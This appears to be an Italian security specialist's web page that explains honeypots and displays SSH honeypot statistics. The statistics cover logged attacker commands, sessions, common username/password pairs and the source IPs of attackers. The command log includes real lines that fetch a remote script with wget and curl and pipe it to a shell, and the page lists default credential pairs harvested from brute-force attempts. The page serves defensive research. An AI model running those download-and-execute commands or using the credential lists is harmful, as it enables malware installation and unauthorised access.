ENG ITA

# Ethical Hacker & ICT Security Specialist

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

SSH

×
Last 50 commands executed
DateCommandSource
2018-07-17 17:47:39uname -a37.110.152.242 Russian Federation
2018-07-17 17:47:35ps -ef | grep '[Mm]iner'37.110.152.242 Russian Federation
2018-07-17 17:47:30ps | grep '[Mm]iner'37.110.152.242 Russian Federation
2018-07-15 09:39:20uname -a188.32.152.57 Russian Federation
2018-07-15 09:39:15ps -ef | grep '[Mm]iner'188.32.152.57 Russian Federation
2018-07-15 09:39:11ps | grep '[Mm]iner'188.32.152.57 Russian Federation
2018-07-14 14:39:54cat >/tmp/.xs/test.mod210.153.228.106 Japan
2018-07-14 14:39:48mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:39:19cat >/tmp/.xs/daemon.mipsel.mod210.153.228.106 Japan
2018-07-14 14:39:13mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:38:44cat >/tmp/.xs/daemon.mips.mod210.153.228.106 Japan
2018-07-14 14:38:39mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:38:10cat >/tmp/.xs/daemon.i686.mod210.153.228.106 Japan
2018-07-14 14:38:04mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:37:35cat >/tmp/.xs/daemon.armv4l.mod210.153.228.106 Japan
2018-07-14 14:37:29mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:15:27cat >/tmp/.xs/test.mod210.153.228.106 Japan
2018-07-14 14:15:22mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:14:53cat >/tmp/.xs/daemon.mipsel.mod210.153.228.106 Japan
2018-07-14 14:14:48mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:14:19cat >/tmp/.xs/daemon.mips.mod210.153.228.106 Japan
2018-07-14 14:14:14mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:13:45cat >/tmp/.xs/daemon.i686.mod210.153.228.106 Japan
2018-07-14 14:13:39mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:13:10cat >/tmp/.xs/daemon.armv4l.mod210.153.228.106 Japan
2018-07-14 14:13:05mkdir /tmp/.xs/210.153.228.106 Japan
2018-07-14 14:12:52cat /proc/version210.153.228.106 Japan
2018-07-14 14:12:47echo -n test210.153.228.106 Japan
2018-07-13 14:00:00wget -e use_proxy=no -q -O - http://dl.peanutman.ru/ptshell|sh && curl --noproxy peanutman.ru -fsSL http://dl.peanutman.ru/ptshell|sh43.245.186.227 Indonesia
2018-07-13 14:00:00curl: option --noproxy not recognized\
43.245.186.227
2018-07-13 13:59:52wget -e use_proxy=no -q -O - http://dl.peanutman.ru/ptshell|sh && curl --noproxy peanutman.ru -fsSL http://dl.peanutman.ru/ptshell|sh43.245.186.227 Indonesia
2018-07-13 13:59:52curl: option --noproxy not recognized\
43.245.186.227
2018-07-11 23:07:15uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:07:11uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:07:03uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:59uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:55uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:49uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:45uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:41uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:34uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:30uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:26uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:22uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:15uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:08uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:04uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:06:00uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:05:50uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
2018-07-11 23:05:45uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 13.58.243.139 United States
×
Last 20 sessions
DateSource
2018-07-18 23:55:23146.0.77.128 Netherlands
2018-07-18 23:44:27146.0.77.128 Netherlands
2018-07-18 23:33:25146.0.77.128 Netherlands
2018-07-18 23:22:22146.0.77.128 Netherlands
2018-07-18 23:11:25146.0.77.128 Netherlands
2018-07-18 23:06:54193.201.224.206 Ukraine
2018-07-18 22:59:055.101.40.150 Russian Federation
2018-07-18 22:48:065.101.40.150 Russian Federation
2018-07-18 22:46:48195.3.147.49 Latvia
2018-07-18 22:37:095.101.40.150 Russian Federation
2018-07-18 22:31:14103.99.2.120 Vietnam
2018-07-18 22:26:065.101.40.150 Russian Federation
2018-07-18 22:15:085.101.40.150 Russian Federation
2018-07-18 22:04:055.101.40.150 Russian Federation
2018-07-18 21:54:21146.0.77.128 Netherlands
2018-07-18 21:51:29195.3.147.49 Latvia
2018-07-18 21:45:14193.201.224.206 Ukraine
2018-07-18 21:43:27146.0.77.128 Netherlands
2018-07-18 21:32:27146.0.77.128 Netherlands
2018-07-18 21:20:045.101.40.150 Russian Federation
×
TOP 15 USER+PASS
CountUsernamePassword
1813 adminadmin123
120 admin
76 adminaerohive
22 rootminer1324
19 ubntubnt
14 adminadmin
13 piraspberryraspberry993311
13 piraspberry
8 rootroot
8 0
7 useruser
7 12341234
7 root12345
6 rootadmin
5 rootpassword
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
125195.3.147.49 Latvia
6013.58.243.139 United States
555.188.87.52 Russian Federation
555.188.87.51 Russian Federation
48193.201.224.206 Ukraine
335.188.86.211 Ireland
225.188.10.76 Croatia
17109.248.9.101 United Kingdom
165.188.86.197 Ireland
16134.19.187.75 Netherlands
165.188.86.174 Ireland
155.188.86.168 Ireland
15109.248.9.102 United Kingdom
155.188.86.210 Ireland
145.188.86.196 Ireland
145.188.86.169 Ireland
11210.153.228.106 Japan
105.188.86.209 Ireland
10109.248.9.103 United Kingdom
8167.114.210.108 Canada
×
TOP 20 attackers
ConnectionsSource
49213.58.243.139 United States
4425.101.40.150 Russian Federation
427146.0.77.128 Netherlands
369146.0.77.174 Netherlands
335146.0.77.173 Netherlands
142195.3.147.49 Latvia
885.188.10.76 Croatia
595.188.87.51 Russian Federation
59193.201.224.206 Ukraine
575.188.87.52 Russian Federation
545.188.86.211 Ireland
45103.99.2.120 Vietnam
29221.5.105.87 China
20120.132.93.80 China
19109.248.9.101 United Kingdom
185.188.86.169 Ireland
185.188.86.174 Ireland
185.188.86.197 Ireland
17109.248.9.103 United Kingdom
165.188.86.210 Ireland

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!